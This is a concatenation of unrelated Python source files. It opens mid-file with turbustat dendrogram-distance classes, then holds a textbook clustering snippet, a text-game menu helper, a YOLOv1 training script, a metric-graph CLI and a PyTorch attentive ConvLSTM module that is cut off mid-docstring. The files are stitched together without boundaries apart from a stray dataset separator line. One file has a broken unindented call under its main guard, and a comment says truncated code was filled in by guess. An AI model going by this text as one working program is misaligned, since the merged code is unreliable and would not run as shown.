        hist_kwargs : dict, optional
            Passed to `~Dendro_Statistics.make_hists`.
        '''
        # FIX: the kwarg dicts previously used mutable defaults ({}); use
        # None sentinels so the defaults cannot be mutated across calls.
        fit_kwargs = {} if fit_kwargs is None else fit_kwargs
        hist_kwargs = {} if hist_kwargs is None else hist_kwargs

        self.compute_dendro(show_progress=show_progress, dendro_obj=dendro_obj,
                            periodic_bounds=periodic_bounds)
        self.fit_numfeat(verbose=verbose, **fit_kwargs)

        if make_hists:
            self.make_hists(**hist_kwargs)

        if verbose:
            self.plot_fit(save_name=save_name, show_hists=make_hists)

        if save_results:
            self.save_results(output_name=output_name)
class Dendrogram_Distance(object):
    """
    Calculate the distance between 2 cubes using dendrograms. The number of
    features vs. minimum delta is fit to a linear model, with an interaction
    term to gauge the difference. The distance is the t-statistic of that
    parameter. The Hellinger distance is computed for the histograms at each
    minimum delta value. The distance is the average of the Hellinger
    distances.

    .. note:: When passing a computed `~DeltaVariance` class for `dataset1`
              or `dataset2`, it may be necessary to recompute the
              dendrogram if `~Dendrogram_Stats.min_deltas` does not equal
              `min_deltas` generated here (or passed as kwarg).

    Parameters
    ----------
    dataset1 : %(dtypes)s or `~Dendrogram_Stats`
        Data cube or 2D image. Or pass a
        `~Dendrogram_Stats` class that may be pre-computed.
        where the dendrogram statistics are saved.
    dataset2 : %(dtypes)s or `~Dendrogram_Stats`
        See `dataset1` above.
    min_deltas : numpy.ndarray or list
        Minimum deltas (branch heights) of leaves in the dendrogram. The set
        of dendrograms must be computed with the same minimum branch heights.
    nbins : str or float, optional
        Number of bins for the histograms. 'best' sets
        that number using the square root of the average
        number of features between the histograms to be
        compared.
    min_features : int, optional
        The minimum number of features (branches and leaves) for the histogram
        be used in the histogram distance.
    dendro_params : dict or list of dicts, optional
        Further parameters for the dendrogram algorithm
        (see the `astrodendro documentation <dendrograms.readthedocs.io>`_
        for more info). If a list of dictionaries is
        given, the first list entry should be the dictionary for `dataset1`,
        and the second for `dataset2`.
    dendro_kwargs : dict, optional
        Passed to `~turbustat.statistics.Dendrogram_Stats.run`.
    dendro2_kwargs : None, dict, optional
        Passed to `~turbustat.statistics.Dendrogram_Stats.run` for `dataset2`.
        When `None` is given, parameters given in `dendro_kwargs` will be used
        for both datasets.
    """

    __doc__ %= {"dtypes": " or ".join(common_types + twod_types +
                                      threed_types)}

    def __init__(self, dataset1, dataset2, min_deltas=None, nbins="best",
                 min_features=100, dendro_params=None,
                 dendro_kwargs=None, dendro2_kwargs=None):

        if not astrodendro_flag:
            raise ImportError("astrodendro must be installed to use "
                              "Dendrogram_Stats.")

        self.nbins = nbins

        if min_deltas is None:
            warnings.warn("Using default min_deltas ranging from 10^-2.5 to"
                          "10^0.5. Check whether this range is appropriate"
                          " for your data.")
            min_deltas = np.logspace(-2.5, 0.5, 100)

        if dendro_params is not None:
            if isinstance(dendro_params, list):
                dendro_params1 = dendro_params[0]
                dendro_params2 = dendro_params[1]
            elif isinstance(dendro_params, dict):
                dendro_params1 = dendro_params
                dendro_params2 = dendro_params
            else:
                raise TypeError("dendro_params is a {}. It must be a dictionary"
                                ", or a list containing a dictionary entries."
                                .format(type(dendro_params)))
        else:
            dendro_params1 = None
            dendro_params2 = None

        # FIX: the original mutated `dendro_kwargs` (a shared mutable default
        # of {}) in-place via .pop, corrupting caller dicts and later calls.
        # Work on private copies instead.
        dendro_kwargs = {} if dendro_kwargs is None else dict(dendro_kwargs)
        if dendro2_kwargs is None:
            dendro2_kwargs = dict(dendro_kwargs)
        else:
            dendro2_kwargs = dict(dendro2_kwargs)

        # These are forced below regardless of what the caller requested.
        for kwargs in (dendro_kwargs, dendro2_kwargs):
            kwargs.pop('make_hists', None)
            kwargs.pop('verbose', None)

        if isinstance(dataset1, Dendrogram_Stats):
            self.dendro1 = dataset1

            # Check if we need to re-run the stat
            has_slope = hasattr(self.dendro1, "_tail_slope")
            # FIX: np.array_equal handles different-length delta arrays; the
            # old elementwise `==` comparison failed in that case.
            match_deltas = np.array_equal(self.dendro1.min_deltas, min_deltas)
            if not has_slope or not match_deltas:
                warn("Dendrogram_Stats needs to be re-run for dataset1 "
                     "to compute the slope or have the same set of "
                     "`min_deltas`.")
                self.dendro1.run(verbose=False, make_hists=False,
                                 **dendro_kwargs)
        else:
            self.dendro1 = Dendrogram_Stats(dataset1, min_deltas=min_deltas,
                                            dendro_params=dendro_params1)
            self.dendro1.run(verbose=False, make_hists=False,
                             **dendro_kwargs)

        if isinstance(dataset2, Dendrogram_Stats):
            self.dendro2 = dataset2

            # Check if we need to re-run the stat
            has_slope = hasattr(self.dendro2, "_tail_slope")
            match_deltas = np.array_equal(self.dendro2.min_deltas, min_deltas)
            if not has_slope or not match_deltas:
                warn("Dendrogram_Stats needs to be re-run for dataset2 "
                     "to compute the slope or have the same set of "
                     "`min_deltas`.")
                self.dendro2.run(verbose=False, make_hists=False,
                                 **dendro2_kwargs)
        else:
            self.dendro2 = \
                Dendrogram_Stats(dataset2, min_deltas=min_deltas,
                                 dendro_params=dendro_params2)
            self.dendro2.run(verbose=False, make_hists=False,
                             **dendro2_kwargs)

        # Set the minimum number of components to create a histogram
        cutoff1 = np.argwhere(self.dendro1.numfeatures > min_features)
        cutoff2 = np.argwhere(self.dendro2.numfeatures > min_features)
        if cutoff1.any():
            cutoff1 = cutoff1[-1]
        else:
            raise ValueError("The dendrogram from dataset1 does not contain the"
                             " necessary number of features, %s. Lower"
                             " min_features or alter min_deltas."
                             % (min_features))
        if cutoff2.any():
            cutoff2 = cutoff2[-1]
        else:
            raise ValueError("The dendrogram from dataset2 does not contain the"
                             " necessary number of features, %s. Lower"
                             " min_features or alter min_deltas."
                             % (min_features))

        # Use the tighter of the two cutoffs for both datasets.
        self.cutoff = np.min([cutoff1, cutoff2])

    @property
    def num_distance(self):
        '''
        Distance between slopes from the for to the
        log Number of features vs. branch height.
        '''
        return self._num_distance

    def numfeature_stat(self, verbose=False,
                        save_name=None, plot_kwargs1=None,
                        plot_kwargs2=None):
        '''
        Calculate the distance based on the number of features statistic.

        Parameters
        ----------
        verbose : bool, optional
            Enables plotting.
        save_name : str, optional
            Saves the plot when a filename is given.
        plot_kwargs1 : dict, optional
            Set the color, symbol, and label for dataset1
            (e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
        plot_kwargs2 : dict, optional
            Set the color, symbol, and label for dataset2.
        '''
        # FIX: copy so caller dicts (and the old mutable defaults) are never
        # modified in-place when defaults are filled in below.
        plot_kwargs1 = {} if plot_kwargs1 is None else dict(plot_kwargs1)
        plot_kwargs2 = {} if plot_kwargs2 is None else dict(plot_kwargs2)

        self._num_distance = \
            np.abs(self.dendro1.tail_slope - self.dendro2.tail_slope) / \
            np.sqrt(self.dendro1.tail_slope_err**2 +
                    self.dendro2.tail_slope_err**2)

        if verbose:
            import matplotlib.pyplot as plt

            defaults1 = {'color': 'b', 'symbol': 'D', 'label': '1'}
            defaults2 = {'color': 'g', 'symbol': 'o', 'label': '2'}

            for key in defaults1:
                if key not in plot_kwargs1:
                    plot_kwargs1[key] = defaults1[key]
            for key in defaults2:
                if key not in plot_kwargs2:
                    plot_kwargs2[key] = defaults2[key]

            # 'xunit' is accepted by other turbustat plotters but not here.
            if 'xunit' in plot_kwargs1:
                del plot_kwargs1['xunit']
            if 'xunit' in plot_kwargs2:
                del plot_kwargs2['xunit']

            plt.figure()

            # Dendrogram 1
            plt.plot(self.dendro1.fitvals[0], self.dendro1.fitvals[1],
                     plot_kwargs1['symbol'], label=plot_kwargs1['label'],
                     color=plot_kwargs1['color'])
            plt.plot(self.dendro1.fitvals[0], self.dendro1.model.fittedvalues,
                     plot_kwargs1['color'])

            # Dendrogram 2
            plt.plot(self.dendro2.fitvals[0], self.dendro2.fitvals[1],
                     plot_kwargs2['symbol'], label=plot_kwargs2['label'],
                     color=plot_kwargs2['color'])
            plt.plot(self.dendro2.fitvals[0], self.dendro2.model.fittedvalues,
                     plot_kwargs2['color'])

            plt.grid(True)
            plt.xlabel(r"log $\delta$")
            plt.ylabel("log Number of Features")
            plt.legend(loc='best')
            plt.tight_layout()

            if save_name is not None:
                plt.savefig(save_name)
                plt.close()
            else:
                plt.show()

        return self

    @property
    def histogram_distance(self):
        return self._histogram_distance

    def histogram_stat(self, verbose=False,
                       save_name=None,
                       plot_kwargs1=None,
                       plot_kwargs2=None):
        '''
        Computes the distance using histograms.

        Parameters
        ----------
        verbose : bool, optional
            Enables plotting.
        save_name : str, optional
            Saves the plot when a filename is given.
        plot_kwargs1 : dict, optional
            Set the color, symbol, and label for dataset1
            (e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
        plot_kwargs2 : dict, optional
            Set the color, symbol, and label for dataset2.
        '''
        # FIX: copy to avoid mutating caller dicts / mutable defaults.
        plot_kwargs1 = {} if plot_kwargs1 is None else dict(plot_kwargs1)
        plot_kwargs2 = {} if plot_kwargs2 is None else dict(plot_kwargs2)

        if self.nbins == "best":
            self.nbins = [np.floor(np.sqrt((n1 + n2) / 2.)) for n1, n2 in
                          zip(self.dendro1.numfeatures[:self.cutoff],
                              self.dendro2.numfeatures[:self.cutoff])]
        else:
            self.nbins = [self.nbins] * \
                len(self.dendro1.numfeatures[:self.cutoff])

        self.nbins = np.array(self.nbins, dtype=int)

        # Rows are delta levels; unused tail columns are NaN-padded so the
        # rows can share one rectangular array.
        self.histograms1 = \
            np.empty((len(self.dendro1.numfeatures[:self.cutoff]),
                      np.max(self.nbins)))
        self.histograms2 = \
            np.empty((len(self.dendro2.numfeatures[:self.cutoff]),
                      np.max(self.nbins)))

        self.bins = []

        for n, (data1, data2, nbin) in enumerate(
                zip(self.dendro1.values[:self.cutoff],
                    self.dendro2.values[:self.cutoff], self.nbins)):

            stand_data1 = standardize(data1)
            stand_data2 = standardize(data2)

            bins = common_histogram_bins(stand_data1, stand_data2,
                                         nbins=nbin + 1)

            self.bins.append(bins)

            hist1 = np.histogram(stand_data1, bins=bins,
                                 density=True)[0]
            # FIX: np.nan, not np.NaN — the NaN alias was removed in
            # NumPy 2.0.
            self.histograms1[n, :] = \
                np.append(hist1, (np.max(self.nbins) -
                                  bins.size + 1) * [np.nan])

            hist2 = np.histogram(stand_data2, bins=bins,
                                 density=True)[0]
            self.histograms2[n, :] = \
                np.append(hist2, (np.max(self.nbins) -
                                  bins.size + 1) * [np.nan])

            # Normalize
            self.histograms1[n, :] /= np.nansum(self.histograms1[n, :])
            self.histograms2[n, :] /= np.nansum(self.histograms2[n, :])

        self.mecdf1 = mecdf(self.histograms1)
        self.mecdf2 = mecdf(self.histograms2)

        self._histogram_distance = hellinger_stat(self.histograms1,
                                                  self.histograms2)

        if verbose:
            import matplotlib.pyplot as plt

            defaults1 = {'color': 'b', 'symbol': 'D', 'label': '1'}
            defaults2 = {'color': 'g', 'symbol': 'o', 'label': '2'}

            for key in defaults1:
                if key not in plot_kwargs1:
                    plot_kwargs1[key] = defaults1[key]
            for key in defaults2:
                if key not in plot_kwargs2:
                    plot_kwargs2[key] = defaults2[key]

            if 'xunit' in plot_kwargs1:
                del plot_kwargs1['xunit']
            if 'xunit' in plot_kwargs2:
                del plot_kwargs2['xunit']

            plt.figure()

            ax1 = plt.subplot(2, 2, 1)
            ax1.set_title(plot_kwargs1['label'])
            ax1.set_ylabel("ECDF")
            for n in range(len(self.dendro1.min_deltas[:self.cutoff])):
                ax1.plot((self.bins[n][:-1] + self.bins[n][1:]) / 2,
                         self.mecdf1[n, :][:self.nbins[n]],
                         plot_kwargs1['symbol'],
                         color=plot_kwargs1['color'])
            ax1.axes.xaxis.set_ticklabels([])

            ax2 = plt.subplot(2, 2, 2)
            ax2.set_title(plot_kwargs2['label'])
            ax2.axes.xaxis.set_ticklabels([])
            ax2.axes.yaxis.set_ticklabels([])
            for n in range(len(self.dendro2.min_deltas[:self.cutoff])):
                ax2.plot((self.bins[n][:-1] + self.bins[n][1:]) / 2,
                         self.mecdf2[n, :][:self.nbins[n]],
                         plot_kwargs2['symbol'],
                         color=plot_kwargs2['color'])

            ax3 = plt.subplot(2, 2, 3)
            ax3.set_ylabel("PDF")
            for n in range(len(self.dendro1.min_deltas[:self.cutoff])):
                bin_width = self.bins[n][1] - self.bins[n][0]
                ax3.bar((self.bins[n][:-1] + self.bins[n][1:]) / 2,
                        self.histograms1[n, :][:self.nbins[n]],
                        align="center", width=bin_width, alpha=0.25,
                        color=plot_kwargs1['color'])
            ax3.set_xlabel("z-score")

            ax4 = plt.subplot(2, 2, 4)
            for n in range(len(self.dendro2.min_deltas[:self.cutoff])):
                bin_width = self.bins[n][1] - self.bins[n][0]
                ax4.bar((self.bins[n][:-1] + self.bins[n][1:]) / 2,
                        self.histograms2[n, :][:self.nbins[n]],
                        align="center", width=bin_width, alpha=0.25,
                        color=plot_kwargs2['color'])
            ax4.set_xlabel("z-score")
            ax4.axes.yaxis.set_ticklabels([])

            plt.tight_layout()

            if save_name is not None:
                plt.savefig(save_name)
                plt.close()
            else:
                plt.show()

        return self

    def distance_metric(self, verbose=False, save_name=None,
                        plot_kwargs1=None, plot_kwargs2=None):
        '''
        Calculate both distance metrics.

        Parameters
        ----------
        verbose : bool, optional
            Enables plotting.
        save_name : str, optional
            Save plots by passing a file name. `hist_distance` and
            `num_distance` will be appended to the file name to distinguish
            the plots made with the two metrics.
        plot_kwargs1 : dict, optional
            Set the color, symbol, and label for dataset1
            (e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
        plot_kwargs2 : dict, optional
            Set the color, symbol, and label for dataset2.
        '''
        if save_name is not None:
            import os
            # Distinguish name for the two plots
            base_name, extens = os.path.splitext(save_name)
            save_name_hist = "{0}.hist_distance{1}".format(base_name, extens)
            save_name_num = "{0}.num_distance{1}".format(base_name, extens)
        else:
            save_name_hist = None
            save_name_num = None

        self.histogram_stat(verbose=verbose, plot_kwargs1=plot_kwargs1,
                            plot_kwargs2=plot_kwargs2,
                            save_name=save_name_hist)

        self.numfeature_stat(verbose=verbose, plot_kwargs1=plot_kwargs1,
                             plot_kwargs2=plot_kwargs2,
                             save_name=save_name_num)

        return self
def DendroDistance(*args, **kwargs):
    '''
    Old name for the Dendrogram_Distance class.
    '''
    # FIX: deprecation notices should use DeprecationWarning, not the bare
    # Warning base class, so the standard warning filters apply.
    warn("Use the new 'Dendrogram_Distance' class. 'DendroDistance' is deprecated and will"
         " be removed in a future release.", DeprecationWarning)
    return Dendrogram_Distance(*args, **kwargs)
def hellinger_stat(x, y):
    '''
    Compute the Hellinger statistic of multiple samples.

    For 1D inputs the pairwise Hellinger distance is returned directly;
    for 2D inputs the mean of the row-wise distances is returned.
    '''
    assert x.shape == y.shape

    if x.ndim == 1:
        return hellinger(x, y)

    return np.mean([hellinger(row_x, row_y) for row_x, row_y in zip(x, y)])
def std_window(y, size=5, return_results=False):
    '''
    Uses a moving standard deviation window to find where the powerlaw break
    is.

    Parameters
    ----------
    y : np.ndarray
        Data.
    size : int, optional
        Odd integer which sets the window size.
    return_results : bool, optional
        If enabled, returns the results of the window. Otherwise, only the
        position of the break is returned.

    Returns
    -------
    break_pos : int
        Index in `y` of the window with the largest standard deviation.
    stds : np.ndarray
        Standard deviation of each window (only when `return_results`).
    '''
    half_size = (size - 1) // 2

    shape = max(y.shape)

    stds = np.empty((shape - size + 1))

    for i in range(half_size, shape - half_size):
        # FIX: include the right edge of the window. The original slice
        # stopped at i + half_size, so each "size"-wide window actually
        # covered only size - 1 samples and ignored the final element.
        stds[i - half_size] = np.std(y[i - half_size: i + half_size + 1])

    # Now find the max
    break_pos = np.argmax(stds) + half_size

    if return_results:
        return break_pos, stds

    return break_pos
"""
Name : c8_08_python_hierachical.py
Book : Hands-on Data Science with Anaconda )
Publisher: Packt Publishing Ltd.
Author : <NAME> and <NAME>
Date : 3/25/2018
email : <EMAIL>
<EMAIL>
"""
import numpy as np
import scipy.cluster.hierarchy as hac
import matplotlib.pyplot as plt
#
n = 100
x = np.random.normal(0, 8, n)
y = np.random.normal(10, 8, n)
a = [x, y]
z = hac.linkage(a, method='single')
# NOTE(review): the source was truncated mid-statement at "plt." (dataset
# artifact). Completed to render the hierarchical clustering result, which
# is the usual ending of this book example — confirm against the original
# listing.
hac.dendrogram(z)
plt.show()
import sys
# Functions for PHS Adventure.
def get_choice(choices):
    # Present a menu built from `choices` ({'token': 'description', ...})
    # and keep prompting until the user types one of the tokens.
    # Typing 'q' exits the program instead of returning.
    print("\nWould you like to: ")
    for token, description in choices.items():
        print("[%s]: %s" % (token, description))
    # Always offer the choice to quit.
    print("[q]: Quit.")

    selection = ''
    while selection not in choices:
        selection = str(input("\nWhat is your choice? "))
        if selection == 'q':
            print("Thanks for playing! Bye.")
            sys.exit()
    return selection
import os
import time
import torch
import argparse
from models.model import YOLOv1
import matplotlib.pyplot as plt
from torchvision import utils
from torch.optim import SGD, Adam
# from torchviz import make_dot
from models import build_model
from utils.util import YOLOLoss, parse_cfg
from utils.datasets import create_dataloader
def train(model, train_loader, optimizer, epoch, device, train_loss_lst):
    """Run one training epoch.

    Appends the epoch's mean batch loss to `train_loss_lst` and returns it.
    On the very first batch of epoch 0, displays a grid of the input images.
    """
    model.train()  # Set the module in training mode
    train_loss = 0
    # Hoisted out of the batch loop: the criterion was rebuilt every batch.
    # NOTE(review): assumes YOLOLoss holds no per-batch state — confirm.
    criterion = YOLOLoss()
    for batch_idx, (inputs, labels) in enumerate(train_loader):
        inputs, labels = inputs.to(device), labels.to(device)

        # foward prop
        outputs = model(inputs)

        # back prop
        optimizer.zero_grad()
        loss = criterion(outputs, labels)
        train_loss += loss.item()
        loss.backward()
        optimizer.step()

        # show batch0 dataset
        if batch_idx == 0 and epoch == 0:
            plt.figure()
            inputs = inputs.cpu()  # convert to cpu
            grid = utils.make_grid(inputs)
            plt.imshow(grid.numpy().transpose((1, 2, 0)))
            plt.show()

        # print loss and accuracy
        if (batch_idx+1) % 2 == 0:
            print('Train Epoch: {} [{}/{} ({:.1f}%)] Loss: {:.6f}'
                  .format(epoch, batch_idx * len(inputs), len(train_loader.dataset),
                          100. * batch_idx / len(train_loader), loss.item()))

    # record training loss
    train_loss /= len(train_loader)
    train_loss_lst.append(train_loss)
    return train_loss_lst
def validate(model, val_loader, device, val_loss_lst):
    """Evaluate on the validation set without gradients.

    Appends the mean validation loss to `val_loss_lst` and returns it.
    """
    model.eval()  # Sets the module in evaluation mode
    val_loss = 0
    # Hoisted out of the loop: the criterion was rebuilt for every batch.
    criterion = YOLOLoss()
    # no need to calculate gradients
    with torch.no_grad():
        for data, target in val_loader:
            data, target = data.to(device), target.to(device)
            output = model(data)
            # add one batch loss
            val_loss += criterion(output, target).item()

    val_loss /= len(val_loader)
    print('\nVal set: Average loss: {:.4f}'.format(val_loss))

    # record validating loss
    val_loss_lst.append(val_loss)
    return val_loss_lst
def test(model, test_loader, device):
    """Evaluate on the test set without gradients and print the mean loss."""
    model.eval()  # Sets the module in evaluation mode
    test_loss = 0
    # Hoisted out of the loop: the criterion was rebuilt for every batch.
    criterion = YOLOLoss()
    # no need to calculate gradients
    with torch.no_grad():
        for data, target in test_loader:
            data, target = data.to(device), target.to(device)
            output = model(data)
            # add one batch loss
            test_loss += criterion(output, target).item()

    # record testing loss
    test_loss /= len(test_loader)
    print('Test set: Average loss: {:.4f}'.format(test_loss))
def arg_parse():
    """Build the command-line interface and parse sys.argv.

    Returns the populated argparse.Namespace of training options.
    """
    parser = argparse.ArgumentParser(description='Food Recognition System')

    parser.add_argument("--cfg", "-c", dest='cfg', type=str,
                        default="cfg/yolov1.cfg",
                        help="Your yolo config file path")
    parser.add_argument("--data", "-d", dest='data', type=str,
                        default="cfg/dataset.cfg",
                        help="Your dataset config file path")
    parser.add_argument("--weights", "-w", dest='weights', type=str,
                        default="",
                        help="Path of pretrained weights")
    parser.add_argument("--output", "-o", dest='output', type=str,
                        default="output",
                        help="Output file path")
    parser.add_argument("--epochs", "-e", dest='epochs', type=int,
                        default=100,
                        help="Training epochs")
    parser.add_argument("--lr", "-lr", dest='lr', type=float,
                        default=0.0002,
                        help="Training learning rate")
    parser.add_argument("--batch_size", "-b", dest='batch_size', type=int,
                        default=32,
                        help="Training batch size")
    parser.add_argument("--input_size", "-i", dest='input_size', type=int,
                        default=448,
                        help="Image input size")
    parser.add_argument("--save_freq", "-s", dest='save_freq', type=int,
                        default=25,
                        help="Frequency of saving model checkpoints when training")

    return parser.parse_args()
if __name__ == "__main__":
    # Parse CLI options and unpack them into locals.
    args = arg_parse()
    cfg, data, weights, output = args.cfg, args.data, args.weights, args.output
    epochs, lr, batch_size, input_size, save_freq = args.epochs, args.lr, args.batch_size, args.input_size, args.save_freq

    # Parse the model and dataset config files (project-specific format).
    cfg = parse_cfg(cfg)
    data_cfg = parse_cfg(data)
    img_path, label_path = data_cfg['dataset'], data_cfg['label']

    # load dataset and dataloader
    # 0.8 / 0.1 / 0.1 train / val / test split.
    train_loader, val_loader, test_loader = create_dataloader(img_path, label_path,
                                                              0.8, 0.1, 0.1, batch_size, input_size)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    # device = "cpu"

    # build model
    model = build_model(weights, cfg).to(device)
    # plot model structure
    # graph = make_dot(model(torch.rand(1, 3, input_size, input_size).cuda()),
    #                  params=dict(model.named_parameters()))
    # graph.render('model_structure', './', cleanup=True, format='png')

    optimizer = SGD(model.parameters(), lr=lr, momentum=0.9)
    # optimizer = Adam(model.parameters(), lr=lr)

    # create output file folder
    # Run directory named by start timestamp; os.makedirs raises if it
    # already exists (only possible when two runs start in the same second).
    start = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
    os.makedirs(os.path.join(output, start))

    # loss list
    train_loss_lst, val_loss_lst = [], []

    # train epoch
    for epoch in range(epochs):
        train_loss_lst = train(model, train_loader,
                               optimizer, epoch, device, train_loss_lst)
        val_loss_lst = validate(model, val_loader, device, val_loss_lst)

        # save model weights every save_freq epoch
        # (epoch 0 is always saved since 0 % save_freq == 0)
        if epoch % save_freq == 0:
            torch.save(model.state_dict(), os.path.join(
                output, start, 'epoch'+str(epoch)+'.pth'))

    test(model, test_loader, device)

    # save model
    torch.save(model.state_dict(), os.path.join(output, start, 'last.pth'))

    # plot loss, save params change
    fig = plt.figure()
    plt.plot(range(epochs), train_loss_lst, 'g', label='train loss')
    plt.plot(range(epochs), val_loss_lst, 'k', label='val loss')
    plt.grid(True)
    plt.xlabel('epoch')
    plt.ylabel('acc-loss')
    plt.legend(loc="upper right")
    now = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
    plt.savefig(os.path.join(output, start, now + '.jpg'))
    plt.show()
#!/usr/bin/env python3
""""
Script that prints graph.
Usage:
python print_graph.py
-e (comma separated input files(each file is an output of script: compute_evaluation.py or
run_all_scrips.py))
-n (comma separated nicknames - for each input file there must be its nickname, that will
identify the input in a graph)
-t (type of graph that will be printed,
it must be one of keys in input files e.g. AUC or EF1)
-d (directory where to store graph)
"""
import argparse
import json
import matplotlib.pyplot as plt
import inputoutput_utils
def _main():
    """Entry point: parse the CLI options and render the requested graph."""
    cfg = _read_configuration()
    print_graph(
        cfg["input_evaluation"],
        cfg["directory"],
        cfg["nicknames"],
        cfg["type"],
    )
def _read_configuration() -> dict:
    """Parse command-line options for the graph-printing script.

    Returns a dict with keys:
      - "input_evaluation": list[str] of evaluation files (split on ",")
      - "nicknames": list[str], one nickname per input file
      - "type": str, the metric key to plot (e.g. AUC or EF1)
      - "directory": str, output directory ("" means current directory)

    Exits with status 1 when the number of nicknames does not match the
    number of input files.
    """
    parser = argparse.ArgumentParser(description="script that prints graph")
    parser.add_argument("-e", type=str, dest="input_evaluation",
                        help="input comma separated files with evaluation", required=True)
    parser.add_argument("-n", type=str, dest="nicknames",
                        help="input nicknames for files that will be printed in graph",
                        required=True)
    parser.add_argument("-t", type=str, dest="type",
                        help="type of graph", required=True)
    parser.add_argument("-d", dest="directory",
                        help="directory where to store graph", required=True)
    configuration = vars(parser.parse_args())
    # str.split already returns the list the old append-loops built by hand.
    configuration["input_evaluation"] = configuration["input_evaluation"].split(",")
    configuration["nicknames"] = configuration["nicknames"].split(",")
    # Defensive only: unreachable while "-d" stays required=True.
    if configuration["directory"] is None:
        configuration["directory"] = ""
    if len(configuration["input_evaluation"]) != len(configuration["nicknames"]):
        print("Wrong input, the number of nicknames must be equal to the number of input files")
        exit(1)
    return configuration
def print_graph(activity_files: list, directory: str, nicknames: list, input_type: str):
    """Plot one metric value per input file and save the figure as a PNG.

    Every file in *activity_files* holds JSON lines; the value stored under
    the upper-cased *input_type* key of each line is collected and plotted
    against *nicknames*. The figure is written to *directory*, or to the
    current directory when *directory* is "".
    """
    metric = input_type.upper()
    values = []
    for path in activity_files:
        with open(path, "r", encoding="utf-8") as handle:
            values.extend(json.loads(row)[metric] for row in handle)
    plt.plot(nicknames, values, marker="o")
    # Human-friendly axis labels for the enrichment-factor metrics.
    axis_labels = {"EF1": "EF 1%", "EF5": "EF 5%"}
    plt.ylabel(axis_labels.get(metric, metric))
    file_name = directory + "/" + metric + ".png" if directory != "" else metric + ".png"
    inputoutput_utils.create_parent_directory(file_name)
    plt.xticks(rotation=90, fontsize="x-small")
    plt.tight_layout()
    plt.savefig(file_name, dpi=150)
    plt.figure()
if __name__ == "__main__":
_main()
| StarcoderdataPython |
228856 | import torch.nn as nn
# Number of recurrent steps the AttentiveLSTM below unrolls in forward().
nb_timestep = 4
# https://github.com/PanoAsh/Saliency-Attentive-Model-Pytorch/blob/master/main.py
class AttentiveLSTM(nn.Module):
    """Attentive ConvLSTM cell unrolled for a fixed number of time steps.

    Port of the attentive LSTM of the Saliency Attentive Model (see the
    reference implementation linked above): at each step an attention map is
    computed from the hidden state and the input, the input feature map is
    re-weighted by it, and a ConvLSTM gate update follows. The final hidden
    state is returned.
    """

    def __init__(self, nb_features_in, nb_features_out, nb_features_att, nb_rows, nb_cols):
        super(AttentiveLSTM, self).__init__()
        # define the fundamantal parameters
        self.nb_features_in = nb_features_in    # channels of the input feature map
        self.nb_features_out = nb_features_out  # channels of hidden/cell state
        self.nb_features_att = nb_features_att  # channels of the attention branch
        self.nb_rows = nb_rows                  # conv kernel size (used for every conv)
        # NOTE(review): nb_cols is stored but never used; all kernels are
        # square (nb_rows) -- confirm that is intended.
        self.nb_cols = nb_cols
        # define convs
        # NOTE(review): padding=1 preserves spatial size only when
        # nb_rows == 3 -- confirm for other kernel sizes.
        self.W_a = nn.Conv2d(in_channels=self.nb_features_att, out_channels=self.nb_features_att,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.U_a = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_att,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.V_a = nn.Conv2d(in_channels=self.nb_features_att, out_channels=1,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=False)
        self.W_i = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.U_i = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.W_f = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.U_f = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.W_c = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.U_c = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.W_o = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        self.U_o = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
                             kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
        # define activations
        self.tanh = nn.Tanh()
        self.sigmoid = nn.Sigmoid()
        # NOTE(review): softmax(dim=-1) normalises over the last (width) axis
        # only, not over the whole attention map -- confirm this is intended.
        self.softmax = nn.Softmax(dim=-1)
        # define number of temporal steps
        self.nb_ts = nb_timestep

    def forward(self, x):
        # get the current cell memory and hidden state
        # (both are initialised from the input feature map itself)
        h_curr, c_curr = x, x
        for i in range(self.nb_ts):
            # the attentive model: attention map from hidden state + input
            my_Z = self.V_a(self.tanh(self.W_a(h_curr) + self.U_a(x)))
            my_A = self.softmax(my_Z)
            AM_cL = my_A * x  # attention-weighted input
            # the convLSTM model: input/forget/output gates and candidate
            my_I = self.sigmoid(self.W_i(AM_cL) + self.U_i(h_curr))
            my_F = self.sigmoid(self.W_f(AM_cL) + self.U_f(h_curr))
            my_O = self.sigmoid(self.W_o(AM_cL) + self.U_o(h_curr))
            my_G = self.tanh(self.W_c(AM_cL) + self.U_c(h_curr))
            c_next = my_G * my_I + my_F * c_curr
            h_next = self.tanh(c_next) * my_O
            c_curr = c_next
            h_curr = h_next
        return h_curr
class SequenceAttentiveLSTM(AttentiveLSTM):
    """AttentiveLSTM variant fed with an explicit frame sequence.

    Instead of unrolling a fixed number of steps on one feature map,
    ``forward`` consumes a 5-D tensor and runs one attentive ConvLSTM
